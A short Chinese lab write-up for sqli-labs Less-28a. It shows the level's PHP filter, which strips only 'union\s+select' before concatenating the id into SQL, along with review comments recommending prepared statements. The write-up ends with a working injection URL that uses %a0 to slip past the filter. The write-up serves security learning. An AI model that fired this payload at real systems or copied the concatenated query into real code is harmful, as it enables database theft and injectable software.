Sqli-labs Less-28a 绕过union\s+select过滤 union注入
关键代码
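/**
 * Input filter used by Less-28a.
 *
 * Removes every case-insensitive occurrence of "union", one or more
 * whitespace characters matched by \s, then "select" from $id, and returns
 * the remaining string. All other filters are commented out in this level.
 *
 * Review note: this is a blacklist, not a safe way to build a query. The
 * pattern has no /u modifier, and in PCRE's default byte mode \s is not
 * expected to match the 0xA0 byte (%a0) that the request on this page puts
 * between the two keywords, so that input passes through unchanged.
 * The durable fix is on the query side (see the comment at the query).
 *
 * @param string $id Raw value taken from the request.
 * @return string $id with the matched "union select" sequences deleted.
 */
function blacklist($id)
{
    // Filters present in the listing but disabled in this level:
    //$id= preg_replace('/[\/\*]/',"", $id);    // strip out /*
    //$id= preg_replace('/[--]/',"", $id);      // strip out --
    //$id= preg_replace('/[#]/',"", $id);       // strip out #
    //$id= preg_replace('/[ +]/',"", $id);      // strip out spaces
    //$id= preg_replace('/select/m',"", $id);   // strip out select
    //$id= preg_replace('/[ +]/',"", $id);      // strip out spaces

    // The only active rule: delete "union<whitespace>select" (case-insensitive).
    $id = preg_replace('/union\s+select/i', "", $id);

    return $id;
}

// Untrusted request parameter, passed through the blacklist only.
$id = $_GET['id'];
$id = blacklist($id);

// NOTE(review): $id is interpolated straight into the SQL text inside ('...').
// Any quote or parenthesis that survives blacklist() changes the statement's
// structure. The fix is to stop concatenating: keep the SQL text constant and
// bind $id as a parameter of a prepared statement (PDO or mysqli), and, since
// it is compared against an id column, validate it as an integer first.
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

//print_r(mysql_error());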
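本关与less28基本一致,只是过滤条件少了几个:只剩下 union\s+select 这一条正则。该正则中的 \s 只匹配常规空白字符,%a0 不在其匹配范围内,所以下面的请求不会被过滤。从防御角度看,黑名单过滤无法可靠地阻止注入,根本的修复是使用参数化查询(预处理语句),并对 id 做整数校验。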
http://127.0.0.1/sql/Less-28a/?id=100')union%a0select 1,database(),3||('1